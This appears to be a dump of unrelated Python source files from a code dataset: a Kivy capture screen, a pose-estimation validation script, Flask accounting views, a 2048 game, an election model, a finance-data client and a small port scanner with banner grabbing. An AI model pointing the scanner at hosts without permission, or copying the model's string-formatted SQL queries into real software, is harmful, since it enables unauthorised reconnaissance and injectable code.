1\nSTATE_CAPTURED = 2\nSTATE_SAVING = 3\n\nSAVE_DIR = \"./database\"\n\nclass LearningScreen(Screen):\n\t_center_text = StringProperty()\n\t_label_text = StringProperty()\n\n\tdef __init__(self, cam, sws, **kwargs):\n\t\tsuper(Screen, self).__init__(**kwargs)\n\n\t\tself._cam = cam\n\t\tself._looper = None\n\t\tself._label_id = 0\n\t\tself._center_text = ''\n\t\tself._label_text = ''\n\t\tself._req_commit = Queue(1)\n\t\tself._sws = sws\n\t\tself._captured_images = None\n\n\tdef on_enter(self):\n\t\tself._sws.enter_sw.register_listener(self.on_btn_changed)\n\t\tself._looper = Clock.schedule_interval(self.on_loop, 0.3)\n\t\tself._center_text = 'Learning Mode'\n\t\tself._label_text = LABEL[self._label_id]\n\t\tself._splash_wait = 7\n\t\tself._state = STATE_SPLASH\n\n\tdef on_btn_changed(self, on_event):\n\t\tif on_event:\n\t\t\tself._req_commit.put(True)\n\n\tdef on_leave(self):\n\t\tself._sws.enter_sw.unregister_listener()\n\t\tself._looper.cancel()\n\n\tdef draw_captured_images(self, images, select):\n\t\tdraw_x_pos = 10\n\t\tdraw_y_pos = self.height - 10\n\t\t\n\t\tcanvas = self.ids.monitor.canvas\n\t\tcanvas.clear()\n\t\twith canvas:\n\t\t\tfor img in images:\n\t\t\t\timg = cv2.flip(img, 0)\n\t\t\t\ttexture = Texture.create(size=(img.shape[1], img.shape[0]), colorfmt=\"rgb\")\n\t\t\t\ttexture.blit_buffer(img.tostring(), bufferfmt=\"ubyte\", colorfmt=\"rgb\")\n\t\t\t\ttexture_size = list(texture.size)\n\n\t\t\t\tRectangle(texture=texture, pos=(draw_x_pos, draw_y_pos - img.shape[0]), size=texture_size)\n\n\t\t\t\tdraw_x_pos += texture_size[0] + 10\n\n\t\t\ttext = CoreLabel(text=\"Would you like to add the images?\", color=(0,0,0,1), font_size=40)\n\t\t\ttext.refresh()\n\t\t\ttexture = text.texture\n\t\t\ttexture_size = list(texture.size)\n\t\t\tRectangle(texture=texture, pos=(10,500), size=texture_size)\n\n\t\t\tlabel_text = CoreLabel(text=\"Label : %s\"%(LABEL[self._label_id]), color=(0,0,0,1), font_size=70)\n\t\t\tlabel_text.refresh()\n\t\t\ttexture = 
label_text.texture\n\t\t\ttexture_size = list(texture.size)\n\t\t\tRectangle(texture=texture, pos=(10,410), size=texture_size)\n\n\t\t\tif select < 0:\n\t\t\t\tyes_text = CoreLabel(text=\"YES\", color=(1.0, 0.4, 0.7, 1.0), font_size=50)\n\t\t\t\tyes_text.refresh()\n\t\t\t\ttexture = yes_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(100,320), size=texture_size)\n\n\t\t\t\tno_text = CoreLabel(text=\"NO\", color=(0.4, 0.7, 1.0, 1.0), font_size=30)\n\t\t\t\tno_text.refresh()\n\t\t\t\ttexture = no_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(300,320), size=texture_size)\n\n\t\t\telse:\n\t\t\t\tyes_text = CoreLabel(text=\"YES\", color=(1.0, 0.4, 0.7, 1.0), font_size=30)\n\t\t\t\tyes_text.refresh()\n\t\t\t\ttexture = yes_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(100,320), size=texture_size)\n\n\t\t\t\tno_text = CoreLabel(text=\"NO\", color=(0.4, 0.7, 1.0, 1.0), font_size=50)\n\t\t\t\tno_text.refresh()\n\t\t\t\ttexture = no_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(300,320), size=texture_size)\n\n\t\t\ts_text = CoreLabel(text=\"/\", color=(0, 0, 0, 1), font_size=30)\n\t\t\ts_text.refresh()\n\t\t\ttexture = s_text.texture\n\t\t\ttexture_size = list(texture.size)\n\t\t\tRectangle(texture=texture, pos=(220,320), size=texture_size)\n\n\tdef canvas_clear(self):\n\t\tcanvas = self.ids.monitor.canvas\n\t\tcanvas.clear()\n\n\tdef _task(self):\n\t\tif self._state==STATE_SPLASH:\n\t\t\tself._splash_wait -= 1\n\t\t\tif self._splash_wait == 0:\n\t\t\t\tself._center_text = \"\"\n\t\t\t\tself._state = STATE_CAPTURING\n\t\telif self._state==STATE_CAPTURING:\n\t\t\tcaptured = self.capture()\n\t\t\tif captured is not None:\n\t\t\t\tself._captured_images = captured\n\t\t\t\tself._state = STATE_CAPTURED\n\t\telif self._state==STATE_CAPTURED:\n\t\t\tselect = 
self._sws.select_meter.get_balance()\n\t\t\tself.draw_captured_images(self._captured_images, select)\n\t\t\tif not self._req_commit.empty():\n\t\t\t\tself._req_commit.get(block=False)\n\t\t\t\tif select < 0:\n\t\t\t\t\tself._state = STATE_SAVING\n\t\t\t\telse:\n\t\t\t\t\tself._state = STATE_CAPTURING\n\t\t\t\tself.canvas_clear()\n\t\telif self._state==STATE_SAVING:\n\t\t\tfor i,img in enumerate(self._captured_images):\n\t\t\t\tname = LABEL[self._label_id] + time.strftime(\"_%Y%m%d%H%M%S\", time.localtime())\n\t\t\t\tname = \"%s%d.jpg\"%(name,i)\n\t\t\t\tpath = os.path.join(SAVE_DIR,name)\n\t\t\t\tcv2.imwrite(path, img)\n\t\t\tself._state = STATE_CAPTURING\n\n\n\tdef on_loop(self, dt):\n\t\tstart = time.time()\n\t\tif self._state==STATE_CAPTURING:\n\t\t\tv = self._sws.select_meter.get_volume()\n\t\t\tself._label_id = int(v*9)\n\t\t\tself._label_text = LABEL[self._label_id]\n\n\t\tmode = self._sws.get_mode_str()\n\t\tif mode=='learning':\n\t\t\tself._task()\n\t\telse:\n\t\t\tself.manager.current = mode\n\t\t\t\n\t\t#print(\"learning\", time.time()-start)\n\t\t\n\tdef capture(self):\n\t\tresult = self._cam.capture()\n\n\t\tif not self._req_commit.empty():\n\t\t\tself._req_commit.get(block=False)\n\t\t\tif not result.moving and len(result.images) > 0:\n\t\t\t\treturn result.images\n\t\t\t\n\t\treturn None\n","sub_path":"cicrops/screen/learning_screen.py","file_name":"learning_screen.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"332310008","text":"from config import *\nimport sys\nsys.path.append(PROJECT_PATH)\n\nimport torch\nfrom dataset.HO_Data.codelab_util import *\nfrom dataset.HO_Data.convert import *\nfrom networks.HO_Nets.HO_Posenet import HO_Posenet\nimport argparse\nimport shutil\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--saveJSON', type=bool, default=False, help='save json or not')\nparser.add_argument('--handout', type=str, 
default='hand_pnet_{}.json'.format(validset), help='File to save the predictions.')\nparser.add_argument('--objout', type=str, default='obj_pnet_{}.json'.format(validset), help='File to save the predictions.')\nparser.add_argument('--figMode', default='2D',choices=['2D', '3DPC',''])\nparser.add_argument('--multi_GPU', type=bool, default=True,help='If the model to load was trained in multi-GPU')\nargs = parser.parse_args()\n#######################################################################################\n###################### Model weights load ###########################\nprint('==> Constructing model ... HO_PNet')\nposenet = HO_Posenet(input_channels=1, hand_channels=handpoints_num, obj_channels=objpoints_num)\nif(args.multi_GPU):\n posenet = torch.nn.DataParallel(posenet)\nposenet = posenet.to(device, dtype)\nposenet.load_state_dict(torch.load(PNet_ckpt)['model_state_dict'])\n\n#######################################################################################\n##################### Validate #################\nprint('==> Testing ..')\nfolder_path = DATA_DIR + '/' + validset\nfile_path = DATA_DIR + '/' + validset + '.txt'\ntransform = V2VVoxelization(cubic_size=200, augmentation=False)\n\n# init output containers\nhand_xyz_list= list()\nobj_xyz_list = list()\nhand_out_path = PROJECT_PATH+'/'+args.handout\nobj_out_path = PROJECT_PATH + '/' + args.objout\n\n############### savefig dir ###########\nif (args.figMode != ''):\n saveFolder = SAVEFIG_DIR + '/PNet/'\n if (os.path.exists(saveFolder)):\n shutil.rmtree(saveFolder)\n os.mkdir(saveFolder)\n\nwith open(file_path) as tf:\n records = tf.readlines()\n #random.shuffle(records)\n for record in records:\n print(record)\n folder, file = tuple(record.rstrip().split('/'))\n depthpath = os.path.join(folder_path, folder, 'depth', file + '.png')\n annotpath = os.path.join(folder_path, folder, 'meta', file + '.pkl')\n depth = read_depth_img(depthpath)\n annot = np.load(annotpath, allow_pickle=True)\n camMat = 
annot['camMat']\n fx = camMat[0, 0]\n fy = camMat[1, 1]\n ux = camMat[0, 2]\n uy = camMat[1, 2]\n\n if (validset != 'evaluation'):\n handJoints = annot['handJoints3D']\n handJoints = handJoints[jointsMapManoToSimple]\n objCorners = annot['objCorners3D']\n gt_hand_uvd = project_3D_points(camMat, handJoints)\n gt_obj_uvd = project_3D_points(camMat, objCorners)\n ################ get the common center point of hand and object ###########\n objcenter = np.mean(gt_obj_uvd, axis=0)\n com = np.mean(np.array([gt_hand_uvd[0], objcenter]), axis=0)\n else:\n ################ for evaluation set ############\n objCorners = annot['objCorners3D']\n obj_uvd = project_3D_points(camMat, objCorners)\n handroot = np.array(annot['handJoints3D'])\n handroot_uvd = project_3D_points(camMat, handroot.reshape(1, -1))\n handroot_uvd = handroot_uvd[0]\n ################ get the common center point of hand and object ###########\n objcenter = np.mean(obj_uvd, axis=0)\n com = np.mean(np.array([handroot_uvd, objcenter]), axis=0)\n\n #################### v2v approach : voxel segment and generate heatmap ###############\n pointcloud = Main_depthmap2points(depth, ux, uy, fx, fy)\n pointcloud = pointcloud.reshape(-1, 3)\n refpoint = Main_pixelToworld(com.reshape(1, -1), ux, uy, fx, fy)\n refpoint = np.array(refpoint)\n\n ################ below part is old. 
needed if voxelization is to be checked from respective file ###########\n # joints_world = Main_pixelToworld(handJoints_uvd.copy(), ux, uy, fx, fy)\n # bbox_world = Main_pixelToworld(obj_uvd.copy(), ux, uy, fx, fy)\n #\n # sample = {\n # 'points': pointcloud,\n # 'joints': joints_world,\n # 'bbox': bbox_world,\n # 'refpoint': refpoint,\n # }\n # voxel88, heatmap_joints, heatmap_bbox = transform(sample)\n # testVis(depthvoxel, heatmap_joints, heatmap_bbox)\n # voxel88 = torch.from_numpy(voxel88.reshape((1, 1, *voxel88.shape))).to(device, dtype)\n\n voxel88 = transform.voxelize88(pointcloud, refpoint)\n voxel88 = torch.Tensor(voxel88).unsqueeze(0).to(device, dtype)\n ####################### get prediction ############################\n with torch.no_grad():\n poseResult = posenet(voxel88)\n\n ##################### post processing of outputs ################\n ###################### hand conversion ####################\n hand_hmp = poseResult['handpose'][0].cpu().numpy()\n handUVD, handxyz = pred2Org_handjoints(hand_hmp, refpoint, ux, uy, fx, fy)\n\n\n ################# object conversion #######################\n obj_hmp = poseResult['objpose'][0].cpu().numpy()\n objbboxUVD, objxyz = pred2Org_objbbox(obj_hmp, refpoint, ux, uy, fx, fy)\n\n\n if (validset != 'evaluation'):\n print('hand points loss:', np.mean(np.linalg.norm((handxyz - annot['handJoints3D']), axis=1)))\n print('obj points loss:', np.mean(np.linalg.norm((objxyz - annot['objCorners3D']), axis=1)))\n\n # ###################### compare GT & prediction on visualization #################\n if (args.figMode != ''):\n fileName = saveFolder + '/' + folder + '_' + file + '.png'\n fig = plt.figure(figsize=(30, 30))\n if (validset == 'evaluation'):\n ax1 = fig.add_subplot(1, 1, 1) \n ax1.title.set_text('Prediction')\n if (args.figMode == '2D'):\n plotOnOrgImg(ax1, handUVD, objbboxUVD, depth)\n elif (args.figMode == '3DPC'):\n draw3dpose(ax1, handUVD, objbboxUVD)\n else:\n if (args.figMode == '2D'):\n ax0 = 
fig.add_subplot(1, 2, 1)\n plotOnOrgImg(ax0,gt_hand_uvd, gt_obj_uvd, depth)\n ax0.title.set_text('Ground Truth')\n\n # show Prediction\n ax1 = fig.add_subplot(1, 2, 2)\n plotOnOrgImg(ax1, handUVD, objbboxUVD, depth)\n ax1.title.set_text('Prediction')\n\n elif (args.figMode == '3DPC'):\n ax0 = fig.add_subplot(1, 2, 1, projection='3d')\n ax0.view_init(elev=0, azim=-50)\n draw3dpose(ax0, gt_hand_uvd, gt_obj_uvd)\n ax0.title.set_text('Ground Truth')\n\n ##### show Prediction\n ax1 = fig.add_subplot(1, 2, 2, projection='3d')\n ax1.view_init(elev=0, azim=-50)\n draw3dpose(ax1, handUVD, objbboxUVD)\n ax1.title.set_text('Prediction')\n\n plt.savefig(fileName)\n plt.close()\n\n\n if (args.saveJSON):\n hand_xyz_list.append(handxyz)\n obj_xyz_list.append(objxyz)\n\n ########## dump results. During testing of qualitative result we don't want to dump ###################\n if(args.saveJSON):\n dump(hand_out_path, hand_xyz_list, [])\n dump(obj_out_path, obj_xyz_list, [])\n","sub_path":"src/final/valid_HO_PNet.py","file_name":"valid_HO_PNet.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"94463940","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom flask import render_template, redirect, request, url_for, flash, session\nfrom flask.ext.login import login_required, login_user, logout_user, current_user\n\nfrom accounting.accounting.service import AccountingService\nfrom accounting.accounting.forms import CostForm\nfrom accounting.users.models import User\nfrom accounting.users.forms import LoginForm\n\n\n@login_required\ndef main():\n months = AccountingService().month_list()\n return render_template(\"mainpage.html\", title='Main', section='', months=months)\n\n\n@login_required\ndef month(year, month_num):\n costs, monthstat, days, cost_by_product = AccountingService().month_data(year, month_num)\n return render_template('month.html',\n title='Month',\n section='cost',\n 
costs=costs,\n monthstat=monthstat,\n days=days,\n cost_by_product=cost_by_product)\n\n\n@login_required\ndef cost_add():\n add_cost_form = CostForm()\n available_products = [one['name'] for one in AccountingService().products()]\n if request.form:\n add_cost_form = CostForm(request.form)\n if add_cost_form.validate():\n AccountingService().cost_add(add_cost_form.date.data,\n add_cost_form.value.data,\n add_cost_form.products.data,\n add_cost_form.comment.data)\n return redirect(url_for('month', year=add_cost_form.date.data.year,\n month_num=add_cost_form.date.data.month))\n\n return render_template('addcost.html',\n title='Add cost',\n section='add',\n form=add_cost_form,\n available_products=json.dumps(available_products))\n\n@login_required\ndef cost_edit(id):\n edit_cost_form = CostForm(request.form)\n available_products = [one['name'] for one in AccountingService().products()]\n if edit_cost_form.validate():\n AccountingService().cost_edit(id,\n edit_cost_form.date.data,\n edit_cost_form.value.data,\n edit_cost_form.products.data,\n edit_cost_form.comment.data)\n\n return redirect(url_for('month', year=edit_cost_form.date.data.year,\n month_num=edit_cost_form.date.data.month))\n else:\n cost = AccountingService().cost_get(id)\n edit_cost_form = CostForm()\n edit_cost_form.date.data = cost.spend_date\n edit_cost_form.value.data = cost.value\n edit_cost_form.products.data = cost.product.name\n edit_cost_form.comment.data = cost.comment\n return render_template('editcost.html',\n title='Edit cost',\n section='add',\n form=edit_cost_form,\n id=id,\n available_products=json.dumps(available_products))\n\n\n@login_required\ndef cost_remove(id):\n cost = AccountingService().costget(id)\n AccountingService().cost_remove(cost)\n return redirect(url_for('month', year=cost.spend_date.year, month_num=cost.spend_date.month))\n\n\n@login_required\ndef product_one(id):\n product, stats = AccountingService().product_one(id)\n return render_template('product.html',\n 
title='products',\n section='product',\n product=product,\n stats=stats)\n\n\n@login_required\ndef product_all():\n products = AccountingService().products()\n return render_template('products.html',\n title='products',\n section='product',\n products=products)\n\n\n@login_required\ndef product_remove(id):\n AccountingService().product_remove(id)\n return redirect(url_for('product_all'))\n\n\ndef login():\n if current_user.is_authenticated():\n return redirect(url_for('index'))\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.select().where(User.username == form.username.data).first()\n if user is not None and user.valid_password(form.password.data):\n if login_user(user, remember=form.remember.data):\n # Enable session expiration only if user hasn't chosen to be\n # remembered.\n session.permanent = not form.remember.data\n flash('Logged in successfully!', 'success')\n return redirect(request.args.get('next') or url_for('index'))\n else:\n flash('This username is disabled!', 'error')\n else:\n flash('Wrong username or password!', 'error')\n return render_template('login.html', form=form)\n\n\n@login_required\ndef logout():\n logout_user()\n flash('You have logged out!')\n return redirect(url_for('index'))\n","sub_path":"src/accounting/frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372733756","text":"V1 = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6]\n\n\ndef longer_sequence(v1):\n valor = 999999999\n sequence, max_lenght, lenght = 0, 0, len(v1)\n for i in range(lenght):\n if valor != v1[i]:\n valor = v1[i]\n sequence = 1\n else:\n sequence = sequence + 1\n if max_lenght < sequence:\n max_lenght = sequence\n 
print(max_lenght)\n","sub_path":"Exercicios/venturus.py","file_name":"venturus.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345073275","text":"from random import randint\nl = [0]*10\nl1 = [' ']*10\ntemp = [0]*10\ntemp2 = []\nnumbers = [2,4]\nprint('************Welcome to 2048 Game************')\nprint(\"----------Press (u or ') for slide up or (d or ;) for slide down or (r or /) for slide right or (l or .) for slide left. For undo press 1----------\")\n\ndef printformat():\n for i in range(1,10):\n if l[i]!=0:\n q = str(l[i])\n for j in range(4-len(q)):\n q+=' '\n l1[i] = q\n else:\n l1[i] = ' '\n print(f'[{l1[1]}|{l1[2]}|{l1[3]}]')\n print(f'[{l1[4]}|{l1[5]}|{l1[6]}]')\n print(f'[{l1[7]}|{l1[8]}|{l1[9]}]\\n')\n\ndef fillnumber():\n while True:\n place = randint(1,9)\n if l[place] == 0:\n l[place] = numbers[randint(0,1)]\n break\n\ndef slideup():\n for i in range(1,7):\n if l[i]==l[i+3]:\n l[i] = l[i]+l[i+3]\n l[i+3] = 0\n for i in range(1,7):\n try:\n if l[i] == l[i+6] and l[i+3]==0:\n l[i] = l[i]+l[i+6]\n l[i+6] = 0\n except:\n pass\n for i in range(1,7):\n try:\n if l[i+3]==l[i+6]:\n l[i+3] = l[i+3]+l[i+6]\n l[i+6] = 0\n except:\n pass\n for i in range(1,10):\n try:\n if l[i]==0:\n l[i] = l[i+3]\n l[i+3] = 0\n except:\n pass\n for i in range(1,10):\n try:\n if l[i]==0:\n l[i] = l[i+3]\n l[i+3] = 0\n except:\n pass\n\ndef slidedown():\n temp[1] = l[7]\n temp[2] = l[8]\n temp[3] = l[9]\n temp[4] = l[4]\n temp[5] = l[5]\n temp[6] = l[6]\n temp[7] = l[1]\n temp[8] = l[2]\n temp[9] = l[3] \n\ndef slideright():\n temp[1] = l[9]\n temp[2] = l[6]\n temp[3] = l[3]\n temp[4] = l[8]\n temp[5] = l[5]\n temp[6] = l[2]\n temp[7] = l[7]\n temp[8] = l[4]\n temp[9] = l[1]\n\ndef slideleft():\n temp[1] = l[1]\n temp[2] = l[4]\n temp[3] = l[7]\n temp[4] = l[2]\n temp[5] = l[5]\n temp[6] = l[8]\n temp[7] = l[3]\n temp[8] = l[6]\n temp[9] = l[9]\n\n\ndef checkwin():\n if 2048 in 
l:\n printformat()\n print('----------You Win----------')\n exit()\n\nplace = randint(1,9)\nl[place] = numbers[randint(0,1)]\nwhile True:\n if 0 not in l[1:]:\n print('Game Over')\n exit()\n fn = randint(1,50)\n if fn not in (11,25,46,50):\n fillnumber()\n temp2.append(l)\n printformat()\n while True:\n opt = input('Enter slide : ')\n if opt in ('u',\"'\"): \n slideup()\n temp2.append(l)\n break\n elif opt in ('r','/'): \n slideright() \n l = list(temp)\n slideup()\n slideright()\n l = list(temp)\n temp2.append(l)\n break\n elif opt in ('l','.'): \n slideleft()\n l = list(temp)\n slideup()\n slideleft()\n l = list(temp)\n temp2.append(l)\n break\n elif opt in ('d',';'):\n slidedown()\n l = list(temp)\n slideup()\n slidedown()\n l = list(temp)\n temp2.append(l)\n break\n elif opt=='1':\n try:\n l = temp2[-3]\n temp2.remove(l)\n except:\n pass\n printformat()\n else:\n printformat()\n checkwin()","sub_path":"2048Game3X3.py","file_name":"2048Game3X3.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441570016","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/flask_cache/_compat.py\n# Compiled at: 2014-04-21 06:45:19\n\"\"\"\n flask_cache._compat\n ~~~~~~~~~~~~~~~~~~~\n\n Some py2/py3 compatibility support based on a stripped down\n version of six so we don't have to depend on a specific version\n of it.\n\n :copyright: (c) 2013 by Armin Ronacher.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nimport sys\nPY2 = sys.version_info[0] == 2\nPYPY = hasattr(sys, 'pypy_translation_info')\nif not PY2:\n range_type = range\nelse:\n range_type = 
xrange","sub_path":"pycfiles/Flask_Cache-0.13.1-py2.7/_compat.py","file_name":"_compat.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78432277","text":"from app.api.v2.database.db import Connection\n\n\nclass Candidate:\n \"\"\" The candidate model \"\"\"\n\n def __init__(self):\n self.db = Connection()\n\n def approve(self, candidate):\n query = \"\"\"UPDATE nominations SET approved=TRUE, dateapproved=NOW() WHERE usr={}\"\"\".format(\n candidate)\n\n self.db.cursor.execute(query)\n return self.db.connection.commit()\n\n def checkApproved(self, candidate):\n if self.db.fetch_approved_candidate(candidate):\n return True\n\n def unApprove(self, candidate):\n if self.checkApproved(candidate):\n query = \"\"\"UPDATE nominations SET approved=FALSE, dateapproved=NOW() WHERE usr={}\"\"\".format(\n candidate)\n\n self.db.cursor.execute(query)\n return self.db.connection.commit()\n\n def getParty(self, candidate):\n data = self.db.fetch_party(candidate)\n party = data[0]\n return party\n\n def getOffice(self, candidate):\n data = self.db.fetch_office(candidate)\n party = data[0]\n return party\n\n def get_all_politicians(self):\n \"\"\"Fetch all politicians\"\"\"\n data = self.db.fetch_all_politicians()\n rows = []\n for i, items in enumerate(data):\n id, user, firstname, lastname, othername, office, party, dateapplied, approved, dateapproved = items\n result = dict(\n id=id,\n usr=user,\n office=office,\n firstname=firstname,\n othername=othername,\n lastname=lastname,\n party=party,\n dateapplied=dateapplied,\n approved=approved,\n dateapproved=dateapproved\n )\n rows.append(result)\n\n return rows\n\n def get_all_candidates(self):\n \"\"\"Get all candidates\"\"\"\n data = self.db.fetch_all_candidates()\n rows = []\n for i, items in enumerate(data):\n id, user, firstname, lastname, othername, office, party, dateapplied, approved, dateapproved = items\n result = dict(\n 
id=id,\n usr=user,\n office=office,\n firstname=firstname,\n othername=othername,\n lastname=lastname,\n party=party,\n dateapplied=dateapplied,\n approved=approved,\n dateapproved=dateapproved\n )\n rows.append(result)\n\n return rows\n\n def get_candidates_per_office(self, id):\n \"\"\"Get candidates per office\"\"\"\n data = self.db.fetch_candidates_per_office(id)\n rows = []\n for i, items in enumerate(data):\n id, user, firstname, lastname, othername, office, party, dateapplied, approved, dateapproved = items\n result = dict(\n id=id,\n usr=user,\n office=office,\n firstname=firstname,\n othername=othername,\n lastname=lastname,\n party=party,\n dateapplied=dateapplied,\n approved=approved,\n dateapproved=dateapproved\n )\n rows.append(result)\n\n return rows\n\n def party_has_candidate(self, candidate):\n if self.db.fetch_party_approved_candidate(self.getParty(candidate), self.getOffice(candidate)):\n return True\n\n def search(self, candidate):\n \"\"\"This function returns True if a user is already a registered candidate.\"\"\"\n if self.db.fetch_single_item('candidates', candidate):\n return True\n\n def get(self, id):\n data = self.db.fetch_candidate('nominations.usr', id)\n return {\n \"candidate\": data[0]+\" \"+data[1],\n \"office\": data[2],\n \"party\": data[3],\n }\n","sub_path":"app/api/v2/models/candidate.py","file_name":"candidate.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272544046","text":"import socket\nclass network: \n def __init__(self, host, ports):\n self.host = host\n self.ports = ports\n\n\n def _createSocket(self):\n self.netSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n def checkPorts(self):\n netSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('[+] Checking ',self.host)\n closedPorts = []\n openPorts = []\n for port in self.ports:\n try:\n rtrn = netSocket.connect_ex((self.host, port))\n 
if(rtrn == 0):\n print('[+] Open Port ', port)\n openPorts.append(port)\n netSocket.close()\n else:\n closedPorts.append(port)\n except Exception as e:\n print('[-] ',e)\n print('[-] Ports closed', str(len(closedPorts)))\n return openPorts\n\n def getBanner(self, openPorts):\n netSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('[+] Banner Check...')\n for port in openPorts:\n try:\n rtrn = netSocket.connect((self.host, port))\n if(rtrn == 0):\n print('[+] Open Port ', port)\n rec = self.netSocket.recvfrom(1024)\n netSocket.close()\n print(rec)\n else:\n print('[-] Faied to get Banner')\n except Exception as e:\n print('[-] ',e)\n \n\n \n \nfrom nSock import network\n\n# Simple Lib to implement a port scan\n","sub_path":"nSock.py","file_name":"nSock.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"552633983","text":"def calc_result(line):\n changes = 0\n for i, side in enumerate(line):\n try:\n if side != line[i + 1]:\n changes += 1\n except IndexError:\n if side == '-':\n return changes + 1\n else:\n return changes\n\n\nif __name__ == '__main__':\n from sys import stdin\n\n is_header = False\n for case, line in enumerate(stdin.read().split()):\n if not is_header:\n is_header = True\n continue\n print('Case #{}: {}'.format(case, calc_result(line)))\n","sub_path":"codes/CodeJamCrawler/16_0_2/fdellavedova/pancakes.py","file_name":"pancakes.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441159775","text":"\"\"\"\nmax R is 10^6 < 1024 * 1024 = 2 ^ 20\nso only need the prime number dictionary smaller than 20\n\"\"\"\nclass Solution(object):\n def countPrimeSetBits(self, L, R):\n \"\"\"\n :type L: int\n :type R: int\n :rtype: int\n \"\"\"\n count = 0\n primeSet = set([2, 3, 5, 7, 11, 13, 17, 19])\n for i in range(L, R + 1):\n if bin(i).count('1') in 
primeSet:\n count += 1\n return count\n","sub_path":"solution/python/762.py","file_name":"762.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"446013103","text":"# Copyright 2017 QuantRocket - All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nfrom quantrocket.houston import houston\nfrom quantrocket.cli.utils.output import json_to_cli\nfrom quantrocket.cli.utils.files import write_response_to_filepath_or_buffer\n\ndef fetch_reuters_financials(universes=None, conids=None):\n \"\"\"\n Fetch Reuters financial statements from IB and save to database.\n\n This data provides cash flow, balance sheet, and income metrics.\n\n Parameters\n ----------\n universes : list of str, optional\n limit to these universes (must provide universes, conids, or both)\n\n conids : list of int, optional\n limit to these conids (must provide universes, conids, or both)\n\n Returns\n -------\n dict\n status message\n\n \"\"\"\n params = {}\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n response = houston.post(\"/fundamental/reuters/financials\", params=params)\n\n houston.raise_for_status_with_json(response)\n return response.json()\n\ndef _cli_fetch_reuters_financials(*args, **kwargs):\n return json_to_cli(fetch_reuters_financials, *args, **kwargs)\n\ndef fetch_reuters_estimates(universes=None, conids=None):\n 
\"\"\"\n Fetch Reuters estimates and actuals from IB and save to database.\n\n This data provides analyst estimates and actuals for a variety of indicators.\n\n Parameters\n ----------\n universes : list of str, optional\n limit to these universes (must provide universes, conids, or both)\n\n conids : list of int, optional\n limit to these conids (must provide universes, conids, or both)\n\n Returns\n -------\n dict\n status message\n\n \"\"\"\n params = {}\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n response = houston.post(\"/fundamental/reuters/estimates\", params=params)\n\n houston.raise_for_status_with_json(response)\n return response.json()\n\ndef _cli_fetch_reuters_estimates(*args, **kwargs):\n return json_to_cli(fetch_reuters_estimates, *args, **kwargs)\n\ndef list_reuters_codes(codes=None, report_types=None, statement_types=None):\n \"\"\"\n List available Chart of Account (COA) codes from the Reuters financials database\n and/or indicator codes from the Reuters estimates/actuals database\n\n Note: you must fetch Reuters financials into the database before you can\n list COA codes.\n\n\n Parameters\n ----------\n codes : list of str, optional\n limit to these Chart of Account (COA) or indicator codes\n\n report_types : list of str, optional\n limit to these report types. Possible choices: financials, estimates\n\n statement_types : list of str, optional\n limit to these statement types. Only applies to financials, not estimates. 
